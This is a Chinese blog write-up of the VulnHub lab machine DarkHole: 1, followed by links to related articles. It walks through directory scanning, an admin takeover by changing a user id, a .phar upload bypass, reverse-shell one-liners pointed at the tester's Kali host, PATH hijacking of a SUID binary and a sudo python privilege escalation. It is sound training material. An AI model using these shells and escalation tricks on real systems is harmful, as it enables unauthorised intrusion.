vulnhub之 DarkHole: 1

最新推荐文章于 2024-01-18 17:29:42 发布
最新推荐文章于 2024-01-18 17:29:42 发布
阅读量128 收藏
点赞数
分类专栏: 网络安全 文章标签: linux python web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwweggfe/article/details/120009420
版权

0x001 信息收集

kali ip : 192.168.181.129

靶机 ip :192.168.181.141

首先进行ip扫描

 对端口进行扫描

 开启了22和80端口

发现端口进行探测没有漏洞可以利用,于是我打开网页

 于是我进行查看源码

于是发现一个login.php的文件,这可能有提示

 于是进行目录扫描

gobuster dir -u http://192.168.181.141/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x html,php,bak,txt

 在http://192.168.181.141/upload/发现一张图片

 于是下载到本地,一开始以为有隐写,尝试多次没有成功,后来还是打开login.php的页面

在login.php页面我可以进行注册并登录

0x002 网页渗透

于是我对修改密码的操作进行抓包,当我们看到id为7,那么我猜测1是不是就是admin用户呢

密码修改成功

 于是使用admin进行登录

 于是我上传php的文件

 没有上传成功,于是我将其后缀改为‘.phar’

 文件上传成功,将其运行,并在kali上使用netcat进行监听

 于是进行外壳反弹

bash -c 'bash -i >& /dev/tcp/192.168.181.129/9999 0>&1'

 于是在/home/john发现一个属组是www-data用户的

 于是进行查看

 于是我发现一个ssh密钥

 于是在kali上生成ssh密钥

ssh-keygen -b 2048 -f key

于是在kali上打开http服务

python3 -m http.server 9999

 并删除靶机上的密钥

 于是将我们生成的密钥下载到目录下

于是我使用ssh进行登录john账号,但是没有成功

但是我发现export可以运行

cd /tmp

echo bash > id

chmod 777 id

export PATH=/tmp:$PATH

echo $PATH

cd /home/john

./toto

 于是再次进行外壳反弹

bash -c 'bash -i >& /dev/tcp/192.168.181.129/5555 0>&1'

 于是我查看了john的密码

 于是进行ssh登录

ssh john@192.168.181.141

 

 于是获得第一个flag

 0x003 提权

于是我对file.php进行编辑

 

 于是运行file.php

sudo /usr/bin/python3 /home/john/file.py

 

 上面说我们可以提权,于是我进行修改

 再次运行file.py

 于是获得最终flag

 

我带的我们
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机-DarkHole: 1
臭nana的博客
08-25 981
靶机描述: Difficulty: Easy It's a box for beginners, but not easy, Good Luck Hint: Don't waste your time For Brute-Force 1、找到靶机ip:192.168.162.132 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root????kali)-[~] └─# nmap -A -p- 192.168.116.132
VulnhubDARKHOLE: 1渗透测试
Bird&Bird
12-07 3230
目录1、靶机概述2、信息收集3、越权操作4、文件上传获取shell5、反弹shell至kali6、获取john用户shell7、获取root权限 1、靶机概述 Description Difficulty: Easy It’s a box for beginners, but not easy, Good Luck Hint: Don’t waste your time For Brute-Force 链接: 靶机下载地址. KALI:192.168.110.128 靶机:192.168.110.136 2
DARKHOLE_1攻略
11-26 916
DARKHOLE_1攻略 简介DARKHOLE_1攻略攻击环境:kali被攻击环境:ubuntukali IP:192.168.133.131ubuntu IP : 未知1.主机发现​ 因为攻击机与被攻击机在同一网段,所以需要通过nmap 进一步确定其ipnmap -sP 所处网段example:nmap -sP 192.168.133.0/24​ 分析可知 Ubuntu ip 为 192.168.133.1352.端口扫描​ 全面扫描,获取端口,判断被攻击者所开服务 nmap -A DARKHOLE_
darkhole1
qq_45747465的博客
06-15 95
打靶机--darkhole1
Neos的渗透测试靶机练习——DarkHole-1
最新发布
qq_38678845的博客
01-18 1001
一次渗透测试练习
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
在XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
1. **环境准备**:首先,你需要下载并导入 Alienum 的 VM 镜像到虚拟机软件(如 VMware 或 VirtualBox)中,确保网络设置为“NAT”模式,以便能与外部网络通信。 2. **信息收集**:演练的第一步是进行信息收集,这...
安全vulnub靶机DARKHOLE: 1
qq_43017750的博客
01-20 4134
DARKHOLE: 1 About Release Back to the Top Name: DarkHole: 1 Date release: 18 Jul 2021 Author: Jehad Alqurashi Series: DarkHole Download Back to the Top Please remember that VulnHub is a free community resource so we are unable to check the machines that a
vulnhub靶场——DarkHole 1
Czheisenberg的博客
02-17 3725
vulnhub靶场——DarkHole 1 WriteUp
VulnHubDarkHole_ 1
2301_76786857的博客
07-09 157
靶机IP:192.168.245.143测试机系统:kali、win10测试机IP:192.168.245.139。
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 524
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
VulnHub靶场之FoxHole: 1.0.1
A_dmin的博客
10-09 1200
VulnHub靶场之FoxHole: 1.0.1 扫描IP以及端口: 访问web页面,扫描一下目录: 有个phpmyadmin,去看看,只是一张图片,,我透: 继续看看robots.txt,得到一个secret.html,访问,看不懂: 发现还有个admin.html,查看一下,得到提示: Maybe take a nice *deep* look at that one purple fox picture? I dunno. 查看一下images,一堆图片,,,发现有三张紫狐的图片: 图
darkhole1靶场渗透通关
tpaer的博客
10-02 929
记录下靶场实战的通关过程。主要通关流程是利用web页面的逻辑漏洞进行越权,再绕过文件上传黑名单上传木马getshell,最后通过本地环境变量进行提权。只是一种思路,也可以用一些其他通杀漏洞(CVE-2021-4034)来打。
VulnHub-DarkHole_1靶机详细渗透教程
MRS_jianai的博客
12-30 2193
VulnHub-DarkHole:1靶机详细渗透教程
vulnhub:FOXHOLE: 1.0.1(复现)
鲨鱼辣椒的博客
07-28 620
这个靶机算是简单到中等难度的,然后虽然大了一点,但好在可以直接使用不用修改网络配置 信息搜集 扫描整个网段发现存活主机 nmap -sP 192.168.179.0/24 对整个网段内的主机进行ping扫描 扫描IP地址发现开启端口及服务 nmap -A -p- 192.168.179.152 扫描该IP地址的全国端口 发现漏洞 看看我们发现了什么,虽然该IP地址开启的服务并不多但是都很经典,看到Apache httpd你想到了什么?对没错就是换行解析漏洞以及未知后缀解析漏洞..
DarkHole_1
weixin_47311099的博客
09-27 901
DarkHole_1攻略 主机发现 ┌──(root????kali)-[~] └─# nmap -sP 192.168.8.0/24 目标靶机为192.168.8.134 全面端口扫描 ┌──(root????kali)-[~] └─# nmap -A 192.168.8.134 22ssh和80http 访问80 发现登录页面 但是我们并不知道用户名密码 越权 点击sign up now 去注册用户 登录后发现存在改密码选项,抓包查看 发现其id为2,可推测id为1的应该是默认的管
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值